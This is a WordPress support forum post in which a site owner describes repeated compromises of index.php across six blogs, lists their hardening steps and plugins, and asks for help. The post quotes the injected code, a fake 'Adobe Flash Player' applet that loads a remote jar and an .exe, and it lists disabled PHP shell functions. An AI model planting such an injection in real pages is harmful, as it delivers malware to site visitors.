Constantly Hacked!

  • e0xbr

    (@e0xbr)


    15 years ago

    Hello

    I have 6 wordpress blogs, in different servers.
    Everytime a hacker attack my website changing my index.php file, adding whatever code he wants like:

    applet name=”Adobe Flash Player 12″ code=”adobeflash.class” archive=”http://xxxxx/bin/adobeflash.jar” width=”1″ height=”1″param
    name=”link” value=http://xxx/bin/adobeflash.exe/applet

    I really don’t know what else to do.

    I changed the index.php permissions to r-r-r, put the file in read-only with chattr, disabled a lot of php functions, without result!

    Blocked PHP Functions:
    php_uname, getmyuid, getmypid, passthru, leak, listen, diskfreespace, tmpfile, link, ignore_user_abord, shell_exec, dl, set_time_limit, exec, system, highlight_file, source, show_source, fpaththru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, phpinfo,chmod,unlink,fwrite

    I installed wp-sentinel, wordpress firewall 2, checked and reinstalled my wordpress from the zero.

    That’s impossile to stop!

    I also removed cpanel external access and ftp access (I can access just from my IP)…

    I’m using Cpanel, PHP 5.3.6, mod_security and the latest version of wordpress in all blogs.

    Everyday, the same thing, he changes my index.php…i’m stuck on this.. Nobody has access to the server than me, the server is new, i’m using new files, I never take the old files when migrating, I installed the blog from the zero and checked page by page from my template for vulnerabilities…and nothing was found.

    I can use SSh just from my ip address too..

    My plugin list

    akismet/
    block-bad-queries/
    breadcrumbs/
    db-cache-reloaded/
    db-cache-reloaded-fix/
    exploit-scanner/
    fuzzy-seo-booster/
    google-sitemap-generator/
    HOTWords.php
    index.php
    platinum-seo-pack/
    redirection/
    search-and-replace/
    seo-image/
    seo-slugs/
    simple-post-template/
    sitemap-generator/
    slayers-custom-widgets/
    w3-total-cache/
    wordpress-popular-posts/
    wp-db-backup/
    wp-no-category-base/
    wp-optimize/
    wp-paginate/
    wp-sentinel/
    wp-smushit/
    wp-super-cache/
    yet-another-related-posts-plugin/

    All plugins are updated like wordpress to the newest version…

    I’m desperate, I cannot sleep anymore.
    How can I stop with this??

    Any suggestions will be plausible, I really just don’t know what to do.

    I am the admin of this server and nothing is out the pattern…everything looks great on the server.
    The Cpanel was installed by my IDC, all password are strong and nobody can access using FTP/WHM/CPANEL just from my ip address.
    I just installed ConfigServer Security&Firewall plugin on my CPanel and mod_security.

    The server is new!…I got it yesterday and today my wordpress was hacked again!

    I really dont know…

    please help..

The topic ‘Constantly Hacked!’ is closed to new replies.